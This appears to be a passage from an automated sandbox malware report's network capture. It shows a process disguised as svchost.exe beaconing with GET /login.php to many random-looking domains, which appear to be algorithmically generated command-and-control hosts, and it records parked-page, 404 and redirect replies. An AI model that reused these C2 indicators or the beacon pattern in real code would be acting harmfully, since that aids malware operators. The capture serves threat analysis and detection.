                                                                                                                                                                                                              Aug 23, 2024 18:47:02.379894018 CEST1236INData Raw: 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 3a 62 65 66 6f
                                                                                                                                                                                                              Data Ascii: ansition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.382414103 CEST1236INData Raw: 65 64 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34 30 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 32 3b 7a 2d 69 6e 64
                                                                                                                                                                                                              Data Ascii: ed.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;ba


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              12192.168.2.449657172.234.222.143806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.898557901 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              13192.168.2.4496585.79.71.225806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.962342978 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.205637932 CEST17INHTTP/1.1 200 OK
                                                                                                                                                                                                              Data Raw:
                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.206259966 CEST17INHTTP/1.1 200 OK
                                                                                                                                                                                                              Data Raw:
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              14192.168.2.44965964.190.63.136806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.463293076 CEST306OUTGET / HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww3.galyqaz.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: vsid=926vr471977221402211128
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.185971975 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:03 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_evc7N5FfUOmf13Nl+8D7+0irHI6C5wXyjgvzJn+lB3E1Qfjr/bYz10KXDPAJSx76rgq4GXBHZuidQRM73OngZw==
                                                                                                                                                                                                              last-modified: Fri, 23 Aug 2024 16:47:03 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-89b87dbbb-97tcb
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 65 76 63 37 4e 35 46 66 55 4f 6d 66 31 33 4e 6c 2b 38 44 37 2b 30 69 72 48 49 36 43 35 77 58 79 6a 67 76 7a 4a 6e 2b 6c 42 33 45 31 51 66 6a 72 2f 62 59 7a 31 30 4b 58 44 50 41 4a 53 78 37 36 72 67 71 34 47 58 42 48 5a 75 69 64 51 52 4d 37 33 4f 6e 67 5a 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 6c 79 71 61 7a 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_evc7N5FfUOmf13Nl+8D7+0irHI6C5wXyjgvzJn+lB3E1Qfjr/bYz10KXDPAJSx76rgq4GXBHZuidQRM73OngZw==><head><meta charset="utf-8"><title>galyqaz.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;galyqaz Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! galyqaz.com is your first and best
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.186605930 CEST1236INData Raw: 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f
                                                                                                                                                                                                              Data Ascii: source for all of the information youre looking for. From general topics to more of what you would expect to find here, galyqaz.com h15D8as it all. We hope you find what you are searching for!"><link rel="icon" type="im
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.186616898 CEST1236INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65
                                                                                                                                                                                                              Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.188390017 CEST672INData Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70
                                                                                                                                                                                                              Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.188400030 CEST1236INData Raw: 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73
                                                                                                                                                                                                              Data Ascii: ration:none}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__inpu
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.190713882 CEST1236INData Raw: 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64
                                                                                                                                                                                                              Data Ascii: n:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-me
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.190726042 CEST1236INData Raw: 65 3a 63 6f 6c 6c 61 70 73 65 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d
                                                                                                                                                                                                              Data Ascii: e:collapse}.cookie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-1B4Erow{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;bord
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.198024988 CEST1236INData Raw: 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35
                                                                                                                                                                                                              Data Ascii: position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#5a6268;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.198038101 CEST1236INData Raw: 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2d 2d 74 77 6f 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 36 2e 35 25 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68 69 76 65 7b 6d 61 72 67 69 6e 2d 74 6f
                                                                                                                                                                                                              Data Ascii: tent__container-ads--twot{margin-top:6.5%}.container-content__webarchive{margin-top:4.5%}.container-content__header{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/arrows.png")
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.198049068 CEST1236INData Raw: 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 37 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e
                                                                                                                                                                                                              Data Ascii: _list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-s
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.200207949 CEST1236INData Raw: 2d 64 6f 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70
                                                                                                                                                                                                              Data Ascii: -domain{display:block;text-align:center} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"galyqaz.com","domainName":"galyqaz.com","domainPrice":2999,"domainCurrency":"USD","adultFlag":false


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              15192.168.2.449660154.212.231.82806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:03.193403959 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:04.229182959 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:04 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:47:04.242908955 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:04.673296928 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:04 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:47:53.356293917 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:53.750860929 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:53 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:47:53.755738020 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:54.163615942 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:53 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              16192.168.2.44966213.248.169.48806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.365961075 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupydeq.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              17192.168.2.449663188.114.97.3806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.388293028 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:16.822725058 CEST797INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:16 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
